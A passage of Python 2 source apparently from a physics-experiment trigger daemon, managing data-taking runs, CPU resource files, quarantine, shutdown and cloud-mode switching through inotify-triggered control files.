try:
for p in self.online_resource_list:
for c in p.cpu:
for resourcename in resourcelist:
if resourcename == c:
ret+=1
except:pass
return ret
def AcquireResource(self,resourcenames,fromstate):
idles = conf.resource_base+'/'+fromstate+'/'
try:
logger.debug("Trying to acquire resource "
+str(resourcenames)
+" from "+fromstate)
for resourcename in resourcenames:
os.rename(idles+resourcename,used+resourcename)
self.n_used+=1
#TODO:fix core pairing with resource.cpu list (otherwise - restarting will not work properly)
if not filter(lambda x: sorted(x.cpu)==sorted(resourcenames),self.online_resource_list):
logger.debug("resource(s) "+str(resourcenames)
+" not found in online_resource_list, creating new")
self.online_resource_list.append(OnlineResource(self,resourcenames,self.lock))
return self.online_resource_list[-1]
logger.debug("resource(s) "+str(resourcenames)
+" found in online_resource_list")
return filter(lambda x: sorted(x.cpu)==sorted(resourcenames),self.online_resource_list)[0]
except Exception as ex:
logger.info("exception encountered in looking for resources")
logger.info(ex)
def MatchResource(self,resourcenames):
for res in self.online_resource_list:
#first resource in the list is the one that triggered inotify event
if resourcenames[0] in res.cpu:
found_all = True
for name in res.cpu:
if name not in resourcenames:
found_all = False
if found_all:
return res.cpu
return None
def ContactResource(self,resourcename):
self.online_resource_list.append(OnlineResource(self,resourcename,self.lock))
self.online_resource_list[-1].ping() #@@MO this is not doing anything useful, afaikt
def ReleaseResource(self,res):
self.online_resource_list.remove(res)
def AcquireResources(self,mode):
logger.info("acquiring resources from "+conf.resource_base)
idles = conf.resource_base
idles += '/idle/' if conf.role == 'fu' else '/boxes/'
try:
dirlist = os.listdir(idles)
except Exception as ex:
logger.info("exception encountered in looking for resources")
logger.info(ex)
logger.info(str(dirlist))
current_time = time.time()
count = 0
cpu_group=[]
#self.lock.acquire()
global machine_blacklist
bldir = os.path.join(self.dirname,'hlt')
blpath = os.path.join(self.dirname,'hlt','blacklist')
if conf.role=='bu':
attempts=100
while not os.path.exists(bldir) and attempts>0:
time.sleep(0.05)
attempts-=1
if attempts<=0:
logger.error('Timeout waiting for directory '+ bldir)
break
if os.path.exists(blpath):
update_success,machine_blacklist=updateBlacklist(blpath)
else:
logger.error("unable to find blacklist file in "+bldir)
for cpu in dirlist:
#skip self
if conf.role=='bu':
if cpu == os.uname()[1]:continue
if cpu in machine_blacklist:
logger.info("skipping blacklisted resource "+str(cpu))
continue
if self.checkStaleResourceFile(idles+cpu):
logger.error("Skipping stale resource "+str(cpu))
continue
count = count+1
try:
age = current_time - os.path.getmtime(idles+cpu)
cpu_group.append(cpu)
if conf.role == 'fu':
if count == nstreams:
self.AcquireResource(cpu_group,'idle')
cpu_group=[]
count=0
else:
logger.info("found resource "+cpu+" which is "+str(age)+" seconds old")
if age < 10:
cpus = [cpu]
self.ContactResource(cpus)
except Exception as ex:
logger.error('encountered exception in acquiring resource '+str(cpu)+':'+str(ex))
return True
#self.lock.release()
def checkStaleResourceFile(self,resourcepath):
try:
with open(resourcepath,'r') as fi:
doc = json.load(fi)
if doc['detectedStaleHandle']==True:
return True
except:
time.sleep(.05)
try:
with open(resourcepath,'r') as fi:
doc = json.load(fi)
if doc['detectedStaleHandle']==True:
return True
except:
logger.warning('can not parse ' + str(resourcepath))
return False
def CheckTemplate(self):
if conf.role=='bu' and conf.use_elasticsearch:
logger.info("checking ES template")
try:
setupES(forceReplicas=conf.force_replicas)
except Exception as ex:
logger.error("Unable to check run appliance template:"+str(ex))
def Start(self):
self.is_ongoing_run = True
#create mon subdirectory before starting
try:
os.makedirs(os.path.join(self.dirname,'mon'))
except OSError:
pass
#start/notify run for each resource
if conf.role == 'fu':
for resource in self.online_resource_list:
logger.info('start run '+str(self.runnumber)+' on cpu(s) '+str(resource.cpu))
self.StartOnResource(resource)
if conf.dqm_machine==False:
self.changeMarkerMaybe(Run.ACTIVE)
#start safeguard monitoring of anelastic.py
self.startAnelasticWatchdog()
elif conf.role == 'bu':
for resource in self.online_resource_list:
logger.info('start run '+str(self.runnumber)+' on resources '+str(resource.cpu))
resource.NotifyNewRunStart(self.runnumber)
#update begin time at this point
self.beginTime = datetime.datetime.now()
for resource in self.online_resource_list:
resource.NotifyNewRunJoin()
logger.info('sent start run '+str(self.runnumber)+' notification to all resources')
self.startElasticBUWatchdog()
self.startCompletedChecker()
def maybeNotifyNewRun(self,resourcename,resourceage):
if conf.role=='fu':
logger.fatal('this function should *never* have been called when role == fu')
return
if self.rawinputdir != None:
#TODO:check also for EoR file?
try:
os.stat(self.rawinputdir)
except:
logger.warning('Unable to find raw directory of '+str(self.runnumber))
return None
for resource in self.online_resource_list:
if resourcename in resource.cpu:
logger.error('Resource '+str(resource.cpu)+' was already processing run ' + str(self.runnumber) + '. Will not participate in this run.')
return None
if resourcename in machine_blacklist:
logger.info("skipping blacklisted resource "+str(resource.cpu))
return None
current_time = time.time()
age = current_time - resourceage
logger.info("found resource "+resourcename+" which is "+str(age)+" seconds old")
if age < 10:
self.ContactResource([resourcename])
return self.online_resource_list[-1]
else:
return None
def StartOnResource(self, resource):
logger.debug("StartOnResource called")
resource.assigned_run_dir=conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding)
resource.StartNewProcess(self.runnumber,
self.online_resource_list.index(resource),
self.arch,
self.version,
self.menu_path,
self.transfermode,
int(round((len(resource.cpu)*float(nthreads)/nstreams))),
len(resource.cpu))
logger.debug("StartOnResource process started")
def Stop(self):
#used to gracefully stop CMSSW and finish scripts
with open(os.path.join(self.dirname,"temp_CMSSW_STOP"),'w') as f:
writedoc = {}
bu_lumis = []
try:
bu_eols_files = filter( lambda x: x.endswith("_EoLS.jsn"),os.listdir(self.rawinputdir))
bu_lumis = (sorted([int(x.split('_')[1][2:]) for x in bu_eols_files]))
except:
logger.error("Unable to parse BU EoLS files")
ls_delay=3
if len(bu_lumis):
logger.info('last closed lumisection in ramdisk is '+str(bu_lumis[-1])+', requesting to close at LS '+ str(bu_lumis[-1]+ls_delay))
writedoc['lastLS']=bu_lumis[-1]+ls_delay #current+delay
else: writedoc['lastLS']=ls_delay
json.dump(writedoc,f)
try:
os.rename(os.path.join(self.dirname,"temp_CMSSW_STOP"),os.path.join(self.dirname,"CMSSW_STOP"))
except:pass
def startShutdown(self,killJobs=False,killScripts=False):
self.runShutdown = threading.Thread(target = self.Shutdown,args=[killJobs,killScripts])
self.runShutdown.start()
def joinShutdown(self):
if self.runShutdown:
try:
self.runShutdown.join()
except:
return
def Shutdown(self,killJobs=False,killScripts=False):
#herod mode sends sigkill to all process, however waits for all scripts to finish
logger.info("run"+str(self.runnumber)+": Shutdown called")
self.pending_shutdown=False
self.is_ongoing_run = False
try:
self.changeMarkerMaybe(Run.ABORTED)
except OSError as ex:
pass
time.sleep(.1)
try:
for resource in self.online_resource_list:
if resource.processstate==100:
logger.info('terminating process '+str(resource.process.pid)+
' in state '+str(resource.processstate)+' owning '+str(resource.cpu))
if killJobs:resource.process.kill()
else:resource.process.terminate()
if resource.watchdog!=None and resource.watchdog.is_alive():
try:
resource.join()
except:
pass
logger.info('process '+str(resource.process.pid)+' terminated')
time.sleep(.1)
logger.info(' releasing resource(s) '+str(resource.cpu))
resource_lock.acquire()
q_clear_condition = (not self.checkQuarantinedLimit()) or conf.auto_clear_quarantined
for resource in self.online_resource_list:
cleared_q = resource.clearQuarantined(doLock=False,restore=q_clear_condition)
for cpu in resource.cpu:
if cpu not in cleared_q:
try:
os.rename(used+cpu,idles+cpu)
self.n_used-=1
except OSError:
#@SM:can happen if it was quarantined
logger.warning('Unable to find resource '+used+cpu)
except Exception as ex:
resource_lock.release()
raise(ex)
resource.process=None
resource_lock.release()
logger.info('completed clearing resource list')
self.online_resource_list = []
try:
self.changeMarkerMaybe(Run.ABORTCOMPLETE)
except OSError as ex:
pass
try:
if self.anelastic_monitor:
if killScripts:
self.anelastic_monitor.terminate()
self.anelastic_monitor.wait()
except OSError as ex:
if ex.errno==3:
logger.info("anelastic.py for run " + str(self.runnumber) + " is not running")
except Exception as ex:
logger.exception(ex)
if conf.use_elasticsearch == True:
try:
if self.elastic_monitor:
if killScripts:
self.elastic_monitor.terminate()
#allow monitoring thread to finish, but no more than 30 seconds after others
killtimer = threading.Timer(30., self.elastic_monitor.kill)
try:
killtimer.start()
self.elastic_monitor.wait()
finally:
killtimer.cancel()
try:self.elastic_monitor=None
except:pass
except OSError as ex:
if ex.errno==3:
logger.info("elastic.py for run " + str(self.runnumber) + " is not running")
else :logger.exception(ex)
except Exception as ex:
logger.exception(ex)
if self.waitForEndThread is not None:
self.waitForEndThread.join()
except Exception as ex:
logger.info("exception encountered in shutting down resources")
logger.exception(ex)
resource_lock.acquire()
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
resource_lock.release()
try:
if conf.delete_run_dir is not None and conf.delete_run_dir == True:
shutil.rmtree(conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding))
os.remove(conf.watch_directory+'/end'+str(self.runnumber).zfill(conf.run_number_padding))
except:
pass
logger.info('Shutdown of run '+str(self.runnumber).zfill(conf.run_number_padding)+' completed')
def ShutdownBU(self):
self.is_ongoing_run = False
try:
if self.elastic_monitor:
#first check if process is alive
if self.elastic_monitor.poll() is None:
self.elastic_monitor.terminate()
time.sleep(.1)
except Exception as ex:
logger.info("exception encountered in shutting down elasticbu.py: " + str(ex))
#logger.exception(ex)
#should also trigger destructor of the Run
resource_lock.acquire()
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
resource_lock.release()
logger.info('Shutdown of run '+str(self.runnumber).zfill(conf.run_number_padding)+' on BU completed')
def StartWaitForEnd(self):
self.is_ongoing_run = False
self.changeMarkerMaybe(Run.STOPPING)
try:
self.waitForEndThread = threading.Thread(target = self.WaitForEnd)
self.waitForEndThread.start()
except Exception as ex:
logger.info("exception encountered in starting run end thread")
logger.info(ex)
def WaitForEnd(self):
logger.info("wait for end thread!")
global cloud_mode
global entering_cloud_mode
global abort_cloud_mode
try:
for resource in self.online_resource_list:
if resource.processstate is not None:
if resource.process is not None and resource.process.pid is not None: ppid = resource.process.pid
else: ppid="None"
logger.info('waiting for process '+str(ppid)+
' in state '+str(resource.processstate) +
' to complete ')
try:
resource.join()
logger.info('process '+str(resource.process.pid)+' completed')
except:pass
resource.clearQuarantined()
resource.process=None
self.online_resource_list = []
if conf.role == 'fu':
logger.info('writing complete file')
self.changeMarkerMaybe(Run.COMPLETE)
try:
os.remove(conf.watch_directory+'/end'+str(self.runnumber).zfill(conf.run_number_padding))
except:pass
try:
if conf.dqm_machine==False:
self.anelastic_monitor.wait()
except OSError,ex:
if "No child processes" not in str(ex):
logger.info("Exception encountered in waiting for termination of anelastic:" +str(ex))
self.anelastic_monitor = None
if conf.use_elasticsearch == True:
try:
self.elastic_monitor.wait()
except OSError,ex:
if "No child processes" not in str(ex):
logger.info("Exception encountered in waiting for termination of anelastic:" +str(ex))
self.elastic_monitor = None
if conf.delete_run_dir is not None and conf.delete_run_dir == True:
try:
shutil.rmtree(self.dirname)
except Exception as ex:
logger.exception(ex)
global runList
#todo:clear this external thread
resource_lock.acquire()
logger.info("active runs.."+str(runList.getActiveRunNumbers()))
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
logger.info("new active runs.."+str(runList.getActiveRunNumbers()))
global resources_blocked_flag
if cloud_mode==True:
if len(runList.getActiveRunNumbers())>=1:
logger.info("VM mode: waiting for runs: " + str(runList.getActiveRunNumbers()) + " to finish")
else:
logger.info("No active runs. moving all resource files to cloud")
#give resources to cloud and bail out
entering_cloud_mode=False
#check if cloud mode switch has been aborted in the meantime
if abort_cloud_mode:
abort_cloud_mode=False
resources_blocked_flag=True
cloud_mode=False
resource_lock.release()
return
move_resources_to_cloud()
resource_lock.release()
ignite_cloud()
logger.info("cloud is on? : "+str(is_cloud_inactive()==False))
try:resource_lock.release()
except:pass
except Exception as ex:
logger.error("exception encountered in ending run")
logger.exception(ex)
try:resource_lock.release()
except:pass
def changeMarkerMaybe(self,marker):
dir = self.dirname
current = filter(lambda x: x in Run.VALID_MARKERS, os.listdir(dir))
if (len(current)==1 and current[0] != marker) or len(current)==0:
if len(current)==1: os.remove(dir+'/'+current[0])
fp = open(dir+'/'+marker,'w+')
fp.close()
else:
logger.error("There are more than one markers for run "
+str(self.runnumber))
return
def checkQuarantinedLimit(self):
allQuarantined=True
for r in self.online_resource_list:
try:
if r.watchdog.quarantined==False or r.processstate==100:allQuarantined=False
except:
allQuarantined=False
if allQuarantined==True:
return True
else:
return False
def startAnelasticWatchdog(self):
try:
self.anelasticWatchdog = threading.Thread(target = self.runAnelasticWatchdog)
self.anelasticWatchdog.start()
except Exception as ex:
logger.info("exception encountered in starting anelastic watchdog thread")
logger.info(ex)
def runAnelasticWatchdog(self):
try:
self.anelastic_monitor.wait()
if self.is_ongoing_run == True:
#abort the run
self.anelasticWatchdog=None
logger.warning("Premature end of anelastic.py for run "+str(self.runnumber))
self.Shutdown(killJobs=True,killScripts=True)
except:
pass
self.anelastic_monitor=None
def startElasticBUWatchdog(self):
try:
self.elasticBUWatchdog = threading.Thread(target = self.runElasticBUWatchdog)
self.elasticBUWatchdog.start()
except Exception as ex:
logger.info("exception encountered in starting elasticbu watchdog thread")
logger.info(ex)
def runElasticBUWatchdog(self):
try:
self.elastic_monitor.wait()
except:
pass
self.elastic_monitor=None
def startCompletedChecker(self):
try:
logger.info('start checking completion of run '+str(self.runnumber))
self.completedChecker = threading.Thread(target = self.runCompletedChecker)
self.completedChecker.start()
except Exception,ex:
logger.error('failure to start run completion checker:')
logger.exception(ex)
def runCompletedChecker(self):
rundirstr = 'run'+ str(self.runnumber).zfill(conf.run_number_padding)
rundirCheckPath = os.path.join(conf.watch_directory, rundirstr)
eorCheckPath = os.path.join(rundirCheckPath,rundirstr + '_ls0000_EoR.jsn')
self.threadEvent.wait(10)
while self.stopThreads == False:
self.threadEvent.wait(5)
if os.path.exists(eorCheckPath) or os.path.exists(rundirCheckPath)==False:
logger.info("Completed checker: detected end of run "+str(self.runnumber))
break
while self.stopThreads==False:
self.threadEvent.wait(5)
success, runFound = self.checkNotifiedBoxes()
if success and runFound==False:
resource_lock.acquire()
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
resource_lock.release()
logger.info("Completed checker: end of processing of run "+str(self.runnumber))
break
def createEmptyEoRMaybe(self):
#this is used to notify elasticBU to fill the end time before it is terminated
rundirstr = 'run'+ str(self.runnumber).zfill(conf.run_number_padding)
rundirCheckPath = os.path.join(conf.watch_directory, rundirstr)
eorCheckPath = os.path.join(rundirCheckPath,rundirstr + '_ls0000_EoR.jsn')
try:
os.stat(eorCheckPath)
except:
logger.info('creating empty EoR file in run directory '+rundirCheckPath)
try:
with open(eorCheckPath,'w') as fi:
pass
time.sleep(.5)
except Exception as ex:
logger.exception(ex)
def checkNotifiedBoxes(self):
keys = boxinfoFUMap.keys()
c_time = time.time()
for key in keys:
#if key==thishost:continue #checked in inotify thread
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:
#key deleted
return False,False
if c_time - etime > 20:continue
#parsing or file access, check failed
if lastStatus==False: return False,False
try:
#run is found in at least one box
if self.runnumber in edata['activeRuns']:return True,True
except:
#invalid boxinfo data
return False,False
#all box data are valid, run not found
return True,False
class RunList:
def __init__(self):
self.runs = []
def add(self,runObj):
runNumber = runObj.runnumber
check = filter(lambda x: runNumber == x.runnumber,self.runs)
if len(check):
raise Exception("Run "+str(runNumber)+" already exists")
#doc = {runNumber:runObj}
#self.runs.append(doc)
self.runs.append(runObj)
def remove(self,runNumber):
#runs = map(lambda x: x.keys()[0]==runNumber)
runs = filter(lambda x: x.runnumber==runNumber,self.runs)
if len(runs)>1:
logger.error("Multiple runs entries for "+str(runNumber)+" were found while removing run")
for run in runs[:]: self.runs.pop(self.runs.index(run))
def getOngoingRuns(self):
#return map(lambda x: x[x.keys()[0]], filter(lambda x: x.is_ongoing_run==True,self.runs))
return filter(lambda x: x.is_ongoing_run==True,self.runs)
def getQuarantinedRuns(self):
return filter(lambda x: x.pending_shutdown==True,self.runs)
def getActiveRuns(self):
#return map(lambda x.runnumber: x, self.runs)
return self.runs[:]
def getActiveRunNumbers(self):
return map(lambda x: x.runnumber, self.runs)
def getLastRun(self):
try:
return self.runs[-1]
except:
return None
def getLastOngoingRun(self):
try:
return self.getOngoingRuns()[-1]
except:
return None
def getRun(self,runNumber):
try:
return filter(lambda x: x.runnumber==runNumber,self.runs)[0]
except:
return None
def isLatestRun(self,runObj):
#TODO:test
return self.runs[-1] == runObj
#return len(filter(lambda x: x.runnumber>runObj.runnumber,self.runs))==0
def getStateDoc(self):
docArray = []
for runObj in self.runs:
docArray.append({'run':runObj.runnumber,'totalRes':runObj.n_used,'qRes':runObj.n_quarantined,'ongoing':runObj.is_ongoing_run,'errors':runObj.num_errors})
return docArray
class RunRanger:
def __init__(self,instance):
self.inotifyWrapper = InotifyWrapper(self)
self.instance = instance
def register_inotify_path(self,path,mask):
self.inotifyWrapper.registerPath(path,mask)
def start_inotify(self):
self.inotifyWrapper.start()
def stop_inotify(self):
self.inotifyWrapper.stop()
self.inotifyWrapper.join()
logger.info("RunRanger: Inotify wrapper shutdown done")
def process_IN_CREATE(self, event):
nr=0
global runList
global cloud_mode
global entering_cloud_mode
global exiting_cloud_mode
global abort_cloud_mode
global resources_blocked_flag
global cached_pending_run
global disabled_resource_allocation
global masked_resources
fullpath = event.fullpath
logger.info('RunRanger: event '+fullpath)
dirname=fullpath[fullpath.rfind("/")+1:]
logger.info('RunRanger: new filename '+dirname)
if dirname.startswith('run'):
if dirname.endswith('.reprocess'):
#reprocessing triggered
dirname = dirname[:dirname.rfind('.reprocess')]
fullpath = fullpath[:fullpath.rfind('.reprocess')]
logger.info('Triggered reprocessing of '+ dirname)
try:os.unlink(event.fullpath)
except:
try:os.rmdir(event.fullpath)
except:pass
if os.path.islink(fullpath):
logger.info('directory ' + fullpath + ' is link. Ignoring this run')
return
if not os.path.isdir(fullpath):
logger.info(fullpath +' is a file. A directory is needed to start a run.')
return
nr=int(dirname[3:])
if nr!=0:
# the dqm BU processes a run if the "global run file" is not mandatory or if the run is a global run
is_global_run = os.path.exists(fullpath[:fullpath.rfind("/")+1] + dqm_globalrun_filepattern.format(str(nr).zfill(conf.run_number_padding)))
dqm_processing_criterion = (not conf.dqm_globallock) or (conf.role != 'bu') or (is_global_run)
if (not conf.dqm_machine) or dqm_processing_criterion:
try:
logger.info('new run '+str(nr))
#terminate quarantined runs
for run in runList.getQuarantinedRuns():
#run shutdown waiting for scripts to finish
run.startShutdown(True,False)
time.sleep(.1)
resources_blocked_flag=False
if cloud_mode==True:
logger.info("received new run notification in CLOUD mode. Ignoring new run.")
#remember this run and attempt to continue it once hltd exits the cloud mode
cached_pending_run = fullpath
os.rmdir(fullpath)
return
if conf.role == 'fu':
bu_dir = bu_disk_list_ramdisk_instance[0]+'/'+dirname
try:
os.symlink(bu_dir+'/jsd',fullpath+'/jsd')
except:
if not conf.dqm_machine:
logger.warning('jsd directory symlink error, continuing without creating link')
pass
else:
bu_dir = ''
#check if this run is a duplicate
if runList.getRun(nr)!=None:
raise Exception("Attempting to create duplicate run "+str(nr))
# in case of a DQM machines create an EoR file
if conf.dqm_machine and conf.role == 'bu':
for run in runList.getOngoingRuns():
EoR_file_name = run.dirname + '/' + 'run' + str(run.runnumber).zfill(conf.run_number_padding) + '_ls0000_EoR.jsn'
if run.is_ongoing_run and not os.path.exists(EoR_file_name):
# create an EoR file that will trigger all the running jobs to exit nicely
open(EoR_file_name, 'w').close()
run = Run(nr,fullpath,bu_dir,self.instance)
if not run.inputdir_exists and conf.role=='fu':
logger.info('skipping '+ fullpath + ' with raw input directory missing')
shutil.rmtree(fullpath)
del(run)
return
resource_lock.acquire()
runList.add(run)
try:
if conf.role=='fu' and not entering_cloud_mode and not has_active_resources():
logger.error('trying to start a run '+str(run.runnumber)+ ' without any available resources - this requires manual intervention !')
except Exception,ex:
logger.exception(ex)
if run.AcquireResources(mode='greedy'):
run.CheckTemplate()
run.Start()
else:
#BU mode: failed to get blacklist
runList.remove(nr)
resource_lock.release()
del(run)
return
resource_lock.release()
if conf.role == 'bu' and conf.instance != 'main':
logger.info('creating run symlink in main ramdisk directory')
main_ramdisk = os.path.dirname(os.path.normpath(conf.watch_directory))
os.symlink(fullpath,os.path.join(main_ramdisk,os.path.basename(fullpath)))
except OSError as ex:
logger.error("RunRanger: "+str(ex)+" "+ex.filename)
logger.exception(ex)
except Exception as ex:
logger.error("RunRanger: unexpected exception encountered in forking hlt slave")
logger.exception(ex)
try:resource_lock.release()
except:pass
elif dirname.startswith('emu'):
nr=int(dirname[3:])
if nr!=0:
try:
"""
start a new BU emulator run here - this will trigger the start of the HLT run
"""
bu_emulator.startNewRun(nr)
except Exception as ex:
logger.info("exception encountered in starting BU emulator run")
logger.info(ex)
os.remove(fullpath)
elif dirname.startswith('end'):
# need to check is stripped name is actually an integer to serve
# as run number
if dirname[3:].isdigit():
nr=int(dirname[3:])
if nr!=0:
try:
endingRun = runList.getRun(nr)
if endingRun==None:
logger.warning('request to end run '+str(nr)
+' which does not exist')
os.remove(fullpath)
else:
logger.info('end run '+str(nr))
#remove from runList to prevent intermittent restarts
#lock used to fix a race condition when core files are being moved around
endingRun.is_ongoing_run==False
time.sleep(.1)
if conf.role == 'fu':
endingRun.StartWaitForEnd()
if bu_emulator and bu_emulator.runnumber != None:
bu_emulator.stop()
#logger.info('run '+str(nr)+' removing end-of-run marker')
#os.remove(fullpath)
except Exception as ex:
logger.info("exception encountered when waiting hlt run to end")
logger.info(ex)
else:
logger.error('request to end run '+str(nr)
+' which is an invalid run number - this should '
+'*never* happen')
else:
logger.error('request to end run '+str(nr)
+' which is NOT a run number - this should '
+'*never* happen')
elif dirname.startswith('herod') or dirname.startswith('tsunami'):
os.remove(fullpath)
if conf.role == 'fu':
global q_list
logger.info("killing all CMSSW child processes")
for run in runList.getActiveRuns():
run.Shutdown(True,False)
time.sleep(.2)
#clear all quarantined cores
for cpu in q_list:
try:
logger.info('Clearing quarantined resource '+cpu)
os.rename(quarantined+cpu,idles+cpu)
except:
logger.info('Quarantined resource was already cleared: '+cpu)
q_list=[]
elif conf.role == 'bu':
for run in runList.getActiveRuns():
run.createEmptyEoRMaybe()
run.ShutdownBU()
#delete input and output BU directories
if dirname.startswith('tsunami'):
logger.info('tsunami approaching: cleaning all ramdisk and output run data')
cleanup_bu_disks(None,True,True)
#contact any FU that appears alive
boxdir = conf.resource_base +'/boxes/'
try:
dirlist = os.listdir(boxdir)
current_time = time.time()
logger.info("sending herod to child FUs")
for name in dirlist:
if name == os.uname()[1]:continue
age = current_time - os.path.getmtime(boxdir+name)
logger.info('found box '+name+' with keepalive age '+str(age))
if age < 20:
try:
connection = httplib.HTTPConnection(name, conf.cgi_port - conf.cgi_instance_port_offset,timeout=5)
time.sleep(0.05)
connection.request("GET",'cgi-bin/herod_cgi.py')
time.sleep(0.1)
response = connection.getresponse()
except Exception as ex:
logger.error("exception encountered in contacting resource "+str(name))
logger.exception(ex)
logger.info("sent herod to all child FUs")
except Exception as ex:
logger.error("exception encountered in contacting resources")
logger.info(ex)
elif dirname.startswith('cleanoutput'):
os.remove(fullpath)
nlen = len('cleanoutput')
if len(dirname)==nlen:
logger.info('cleaning output (all run data)'+str(rn))
cleanup_bu_disks(None,False,True)
else:
try:
rn = int(dirname[nlen:])
logger.info('cleaning output (only for run '+str(rn)+')')
cleanup_bu_disks(rn,False,True)
except:
logger.error('Could not parse '+dirname)
elif dirname.startswith('cleanramdisk'):
os.remove(fullpath)
nlen = len('cleanramdisk')
if len(dirname)==nlen:
logger.info('cleaning ramdisk (all run data)'+str(rn))
cleanup_bu_disks(None,True,False)
else:
try:
rn = int(dirname[nlen:])
logger.info('cleaning ramdisk (only for run '+str(rn)+')')
cleanup_bu_disks(rn,True,False)
except:
logger.error('Could not parse '+dirname)
elif dirname.startswith('populationcontrol'):
if len(runList.runs)>0:
logger.info("terminating all ongoing runs via cgi interface (populationcontrol): "+str(runList.getActiveRunNumbers()))
for run in runList.getActiveRuns():
if conf.role=='fu':
run.Shutdown(True,True)
elif conf.role=='bu':
run.ShutdownBU()
logger.info("terminated all ongoing runs via cgi interface (populationcontrol)")
os.remove(fullpath)
elif dirname.startswith('harakiri') and conf.role == 'fu':
os.remove(fullpath)
pid=os.getpid()
logger.info('asked to commit seppuku:'+str(pid))
try:
logger.info('sending signal '+str(SIGKILL)+' to myself:'+str(pid))
retval = os.kill(pid, SIGKILL)
logger.info('sent SIGINT to myself:'+str(pid))
logger.info('got return '+str(retval)+'waiting to die...and hope for the best')
except Exception as ex:
logger.error("exception in committing harakiri - the blade is not sharp enough...")
logger.error(ex)
elif dirname.startswith('quarantined'):
try:
os.remove(dirname)
except:
pass
if dirname[11:].isdigit():
nr=int(dirname[11:])
if nr!=0:
try:
run = runList.getRun(nr)
if run.checkQuarantinedLimit():
if runList.isLatestRun(run):
logger.info('reached quarantined limit - pending Shutdown for run:'+str(nr))
run.pending_shutdown=True
else:
logger.info('reached quarantined limit - initiating Shutdown for run:'+str(nr))
run.startShutdown(True,False)
except Exception as ex:
logger.exception(ex)
elif dirname.startswith('suspend') and conf.role == 'fu':
logger.info('suspend mountpoints initiated')
replyport = int(dirname[7:]) if dirname[7:].isdigit()==True else conf.cgi_port
global suspended
suspended=True
#terminate all ongoing runs
for run in runList.getActiveRuns():
run.Shutdown(True,True)
time.sleep(.5)
#local request used in case of stale file handle
if replyport==0:
umount_success = cleanup_mountpoints()
try:os.remove(fullpath)
except:pass
suspended=False
logger.info("Remount requested locally is performed.")
return
umount_success = cleanup_mountpoints(remount=False)
if umount_success==False:
time.sleep(1)
logger.error("Suspend initiated from BU failed, trying again...")
#notifying itself again
try:os.remove(fullpath)
except:pass
fp = open(fullpath,"w+")
fp.close()
return
#find out BU name from bus_config
bu_name=None
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if os.path.exists(bus_config):
for line in open(bus_config):
bu_name=line.split('.')[0]
break
#first report to BU that umount was done
try:
if bu_name==None:
logger.fatal("No BU name was found in the bus.config file. Leaving mount points unmounted until the hltd service restart.")
os.remove(fullpath)
return
connection = httplib.HTTPConnection(bu_name, replyport+20,timeout=5)
connection.request("GET",'cgi-bin/report_suspend_cgi.py?host='+os.uname()[1])
response = connection.getresponse()
except Exception as ex:
logger.error("Unable to report suspend state to BU "+str(bu_name)+':'+str(replyport+20))
logger.exception(ex)
#loop while BU is not reachable
while True:
try:
#reopen bus.config in case is modified or moved around
bu_name=None
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if os.path.exists(bus_config):
try:
for line in open(bus_config):
bu_name=line.split('.')[0]
break
except:
logger.info('exception test 1')
time.sleep(5)
continue
if bu_name==None:
logger.info('exception test 2')
time.sleep(5)
continue
logger.info('checking if BU hltd is available...')
connection = httplib.HTTPConnection(bu_name, replyport,timeout=5)
connection.request("GET",'cgi-bin/getcwd_cgi.py')
response = connection.getresponse()
logger.info('BU hltd is running !...')
#if we got here, the service is back up
break
except Exception as ex:
try:
logger.info('Failed to contact BU hltd service: ' + str(ex.args[0]) +" "+ str(ex.args[1]))
except:
logger.info('Failed to contact BU hltd service '+str(ex))
time.sleep(5)
#mount again
cleanup_mountpoints()
try:os.remove(fullpath)
except:pass
suspended=False
logger.info("Remount is performed")
elif dirname=='stop' and conf.role == 'fu':
logger.fatal("Stopping all runs..")
masked_resources=True
#make sure to not run inotify acquire while we are here
resource_lock.acquire()
disabled_resource_allocation=True
resource_lock.release()
#shut down any quarantined runs
try:
for run in runList.getQuarantinedRuns():
run.Shutdown(True,False)
listOfActiveRuns = runList.getActiveRuns()
for run in listOfActiveRuns:
if not run.pending_shutdown:
if len(run.online_resource_list)==0:
run.Shutdown(True,False)
else:
resource_lock.acquire()
run.Stop()
resource_lock.release()
time.sleep(.1)
except Exception as ex:
logger.fatal("Unable to stop run(s)")
logger.exception(ex)
disabled_resource_allocation=False
try:resource_lock.release()
except:pass
os.remove(fullpath)
elif dirname.startswith('exclude') and conf.role == 'fu':
#service on this machine is asked to be excluded for cloud use
if cloud_mode:
logger.info('already in cloud mode')
os.remove(fullpath)
return
else:
logger.info('machine exclude initiated')
if is_cloud_inactive()>=100:
logger.error("Unable to switch to cloud mode (igniter script error)")
os.remove(fullpath)
return
#make sure to not run not acquire resources by inotify while we are here
resource_lock.acquire()
cloud_mode=True
entering_cloud_mode=True
resource_lock.release()
time.sleep(.1)
#shut down any quarantined runs
try:
for run in runList.getQuarantinedRuns():
run.Shutdown(True,False)
requested_stop=False
listOfActiveRuns = runList.getActiveRuns()
for run in listOfActiveRuns:
if not run.pending_shutdown:
if len(run.online_resource_list)==0:
run.Shutdown(True,False)
else:
resource_lock.acquire()
requested_stop=True
run.Stop()
resource_lock.release()
time.sleep(.1)
resource_lock.acquire()
if requested_stop==False:
#no runs present, switch to cloud mode immediately
entering_cloud_mode=False
move_resources_to_cloud()
resource_lock.release()
ignite_cloud()
logger.info("cloud is on? : "+str(is_cloud_inactive()==False))
except Exception as ex:
logger.fatal("Unable to clear runs. Will not enter VM mode.")
logger.exception(ex)
entering_cloud_mode=False
cloud_mode=False
try:resource_lock.release()
except:pass
os.remove(fullpath)
elif dirname.startswith('include') and conf.role == 'fu':
#masked_resources=False
if cloud_mode==False:
logger.error('received notification to exit from cloud but machine is not in cloud mode!')
os.remove(fullpath)
if not is_cloud_inactive():
logger.info('cloud scripts are running, trying to stop')
extinguish_cloud()
return
resource_lock.acquire()
if entering_cloud_mode:
abort_cloud_mode=True
resource_lock.release()
os.remove(fullpath)
return
resource_lock.release()
#run stop cloud notification
exiting_cloud_mode=True
